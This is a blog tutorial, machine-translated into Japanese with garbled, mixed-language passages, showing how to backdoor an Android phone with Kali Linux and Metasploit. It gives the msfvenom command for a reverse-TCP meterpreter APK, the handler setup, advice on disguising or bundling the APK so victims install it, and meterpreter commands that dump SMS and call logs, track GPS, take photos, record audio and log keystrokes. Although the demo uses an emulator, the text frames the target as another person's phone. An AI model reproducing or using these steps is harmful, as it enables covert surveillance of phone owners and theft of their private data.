Kali Linux は MSF を使用して Android フォンに侵入します (小さな白いバージョンは非常に詳細です)

1.msfとは

msfvenom は、Metasploit スタンドアロン ペイロード ジェネレーターであり、msfpayload および msfencode の代替でもあります。バックドアの生成に使用されるソフトウェアです。
MSFvenom は、Msfpayload と Msfencode を組み合わせたもので、両方のツールを単一の Framework インスタンスに配置します。2015 年 6 月 8 日の時点で、msfvenom は msfpayload と msfencode を置き換えます。

デモ環境

デモ運用にはKali 2021.3を使用
対象ドローン:エミュレータXiaoyao Android 7.1.2
ソフトウェア:msfvenommsfconsole(Kaliシステム内蔵)

第二に、浸透プロセス

1. 管理者モードに入る

コマンド: sudo su
説明:管理者モードで実行しない場合、権限が不十分であることを示すプロンプトが表示される場合があります。コマンドの実行が失敗しないようにするには、管理者権限で次のコマンドを実行してください。

ここに画像の説明を挿入

ヒント: コマンドの実行後に Kali のパスワードを入力します。パスワードは非表示になっています。直接入力して Enter を押してください。

2. 実行可能なトロイの木馬ファイルを生成する

コマンド: 例:説明: The local ip writes the IP address of your own Kali, and you can use ifconfig to view the IP address of your own Kali.ローカル ポートは、占有されていないポート番号を設定できます. ポート番号がポート番号はあくまでファイル名ですので、フリーサムズアップなど、好きな名前を書いても構いませんが、対象のホストがフックされやすくなるかもしれませんmsfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk



kali ホストの IP アドレス

これは Kali ホストの IP アドレスです

次に、コマンドを実行してトロイの木馬を生成します
ここに画像の説明を挿入

デフォルトで生成されるファイルはルート ディレクトリにあります
ここに画像の説明を挿入

生成したばかりの Android バックドアをターゲットのドローンに配置する

3. msfconsole コマンドを実行します

注文: msfconsole

ここに画像の説明を挿入

4. 設定パラメータ

(1) Command: use exploit/multi/handler (モジュールを選択)
(2) Command: set payload android/meterpreter/reverse_tcp (攻撃モジュールを選択)
(3) Command: set LhOST 192.168.32.1 (自ホストのIPアドレスを記入)
(4) Command: set lport 5555 (攻撃時のポート番号を記入)
(5) コマンド: show options (設定パラメータを表示) (
6) コマンド: exploit -z -j (バックグラウンドで実行)

パラメータ設定後、対象マシンでプログラムを開き、手順6のコマンドを実行する コマンドを直接入力しexploitて攻撃を開始することもできる 対象マシンにバックドアソフトがインストールされていれば、どのような方法でもかまわない、攻撃を直接実行して攻撃を開始できます。

詳細な攻撃設定パラメータのデモ:
ここに画像の説明を挿入

ターゲットドローンがアプリを開くのを待ちます

5. ターゲット マシンで実行可能ファイルを開きます。

ここに画像の説明を挿入

ここでプログラムを偽装したり、アイコンを変更したり、ソフトウェアにバンドルしたりすることもできます。ユーザーがプログラムを開くと、相手のコンピューターに自動的にインストールされます。

6. ユーザーを表示する

(1) コマンド: sessions (フックされたユーザーを表示)
(2) コマンド: sessions -i 1 (攻撃対象のユーザーを選択)

ここに画像の説明を挿入

侵入meterpreterに成功したようです

3. Meterpreter が Android フォンのコマンドをハッキング

1. 相手の携帯電話のシステム情報を確認する

注文: sysinfo

ここに画像の説明を挿入

2.相手の電話にインストールされているアプリファイルを確認する

注文: app_list

3. 相手の携帯電話を遠隔操作して写真を撮る

注文: webcam_snap

4. 相手の携帯電話を遠隔操作してビデオチャットを開始する

注文: webcam_chat

5.相手の携帯電話の情報をリアルタイムで見る

注文: dump_sms
ここに画像の説明を挿入

6.相手の携帯電話のアドレス帳を取得する

注文: dump_calllog
ここに画像の説明を挿入

7.相手の携帯電話のGPS位置をリアルタイムで取得

注文: geolocate
ここに画像の説明を挿入

8. その他のコマンド

ヘルプ ドキュメント、コマンドを表示することもできます。help

cmd指令:
cat read file content to screen
cd change directory
checksum retrieve file checksum
cp コピー元からコピー先
del delete 指定ファイル
dir list ファイル (ls のエイリアス)
download ダウンロード ファイルまたはディレクトリ
edit edit ファイル
getlwd print local working directory
getwd print working directory
lcd change local作業ディレクトリlls
ローカル ファイルのリストlpwd
ローカル作業ディレクトリの
リスト ls ファイルのリスト
mkdir ディレクトリの作成
mv ソースから宛先への移動
pwd 作業ディレクトリの出力
rm 指定したファイルの
削除 rmdir ディレクトリの削除pkill kill プロセスを名前で



meterpreter命令:
keyscan_start キーストロークのキャプチャを開始 (キーロギングの開始) keyscan_dump
キーストローク バッファのダンプ (キーロギングのダウンロード)
keyscan_stop キーストロークのキャプチャの停止 (キーロギングの停止)
record_mic デフォルトのマイクから X 秒
ポップアップ ウィンドウ)
webcam_list シングル カメラ (カメラ リストを表示)
webcam_snap 指定したカメラからスナップショットを取得 (カメラで写真を撮影)
webcam_stream 指定したカメラからビデオ ストリームを再生 (カメラ監視を開く)
enumdesktops アクセス可能なすべてのデスクトップとウィンドウ ステーション (フォームのリスト)
getdesktop 現在の meterpreter デスクトップを取得
起動 再起動 リモート コンピューター
シャットダウン シャットダウン リモート コンピューター
シェル put システム コマンド シェルenumdesktops
アクセス可能なすべてのデスクトップとウィンドウ ステーションを一覧表示イベントkeyscan_dump キーストローク バッファのダンプ keyscan_start キーストロークのキャプチャを開始します keyscan_stop キーストロークのキャプチャを停止します マウス マウス イベントを送信します








screenshare リモート ユーザーのデスクトップをリアルタイムで見る
スクリーンショット インタラクティブなデスクトップのスクリーンショットを撮る
setdesktop change Meterpreters 現在のデスクトップ
uictl コントロール 一部のユーザー インターフェイス コンポーネント
record_mic デフォルトのマイクからオーディオを X 秒間
録音 webcam_chat ビデオ チャットを開始
webcam_list リスト webcam
webcam_snap 指定した Web カメラからキャプチャ スナップショット
webcam_stream指定された Web カメラからのビデオ ストリーム
play ターゲット システムで wave オーディオ ファイル (.wav) を再生する
getsystem 権限をローカル システムの権限に昇格しようと
する

把文件上传到靶机命令
画像の説明を追加してください

把文件下载到主机命令
ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/RFZ_322/article/details/124277545